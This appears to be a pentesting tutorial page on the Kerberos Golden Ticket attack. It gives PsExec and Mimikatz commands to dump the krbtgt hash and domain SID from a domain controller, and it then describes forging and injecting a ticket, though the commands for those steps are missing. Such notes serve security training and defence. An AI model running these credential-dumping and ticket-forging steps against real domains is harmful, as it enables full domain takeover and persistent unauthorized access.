Golden Ticket
Golden Ticket
If we can get our hands on the krbtgt password hash, we could create our self-made custom TGTs, also known as golden tickets.
Golden Tickets permit us to access the entire domain's resources.
Silver Tickets aim to forge a TGS ticket to access a specific service.
The best advantage is that the krbtgt account password is not automatically changed.
Step 1: Attempt to Access the Domain Controller (DC)
# Make sure you have uploaded PSTool in the victim machine.
# To test run the below command:
.\PsExec64.exe \\DC1 cmd.exe
# Does it fail?Step 2: Extract the krbtgt Hash Using Mimikatz
If the process fails, you may not have permission to access the DC. Therefore, to gain access, we will first extract the hash using Mimikatz.
Using a higher privilege account, we will attempt to extract the password of the krbtgt account. We will obtain the NTLM hash of the krbtgt account, along with the domain SID, to forge and inject a golden ticket.
# Make sure you have mimikatz uploaded :)
.\mimikatz.exe "privilege::debug" "log" "lsadump::lsa /patch" "exit"
# Make a note of NTLM and SID.
# Example:
# Domain SID: S-1-5-21-1987370270-658905905-1781884369 (See top of output)
# krbtgt hash: 1693c6cefafffc7af11ef34d1c788f47
The lsadump module in Mimikatz is used to extract sensitive information from the Local Security Authority (LSA) subsystem on Windows systems.
/patch: Enables reading LSA secrets by bypassing certain protections.
Step 3: Forge and Inject the Golden Ticket
Move to the Account for which you want to create a golden ticket.
Clear the already existing tickets. We can clear any existing Kerberos tickets using kerberos::purge in mimikatz
Now we will make Golden Ticker and then run cmd.
Step 4: Verify Access to the Domain Controller
I will attempt to access it again. Please run the command below in a new terminal which is launched in the previous command:
Verify the group.
Last updated